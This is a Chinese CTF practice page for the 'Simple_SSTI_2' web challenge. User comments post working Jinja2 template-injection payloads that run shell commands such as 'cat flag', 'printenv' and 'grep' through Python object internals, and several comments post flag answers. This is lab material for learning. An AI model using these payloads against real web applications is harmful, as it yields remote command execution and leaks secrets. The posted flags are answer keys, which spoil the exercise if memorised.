Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 15799
提  示:
描  述:
Simple_SSTI_2
评论
hao7 25天前

?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}

回复 1

Fusang 1月前

?flag={{''.__class__.__base__.__subclasses__()[425].__init__.__globals__['os'].popen('cat flag').read()}}

回复 0

超爱西西鸭 3月前

/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}

回复 1

pettter 4月前

?id={{config.__class__.__init__.__globals__['os'].popen('printenv').read()}}

回复 0

不会写代码的菜鸟 5月前

大佬们,为啥不能直接flag={{os.popen('cat ../app/flag').read()}}还需要加上那么多前缀

回复 1
qingchuan 4月前

因为没有import os,os是未定义的

回复 3

q1152874733 5月前

http://114.67.175.224:11052/?flag={{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag').read()")}}

回复 0

Royic 5月前

/?flag={{config.__class__.__init__.__globals__['os'].popen('grep -r flag{ ./').read()}}

回复 0

sz007 6月前

flag{6c85015e98aa08e245d15289704dfd8b}

回复 0

如你所愿 6月前

flag{5566f3c3cc3821f4a768384d2a387aae}

回复 0

109349 6月前

flag{2682096b09e88fe5f1faee731c0d36d7}

回复 0

WriteUp

image
valecalida

5 金币

评分(15)

解题动态

18185185996 攻破了该题 3天前
KKsama 攻破了该题 3天前
zhuguangsen 攻破了该题 3天前
5013230204 攻破了该题 5天前
kale 攻破了该题 8天前
guoadmin 攻破了该题 9天前
wxq666 攻破了该题 9天前
她说我们只是朋友 攻破了该题 9天前
wbbcw 攻破了该题 9天前
ifnoif 攻破了该题 10天前
zhiyin 攻破了该题 10天前
wsc1 攻破了该题 10天前
jsc111 攻破了该题 10天前
lihonglin 攻破了该题 10天前
2814217278 攻破了该题 10天前
13607979046 攻破了该题 10天前
1370446421 攻破了该题 11天前
燃燃然燃 攻破了该题 12天前
locust 攻破了该题 14天前
2323277194 攻破了该题 14天前
问题反馈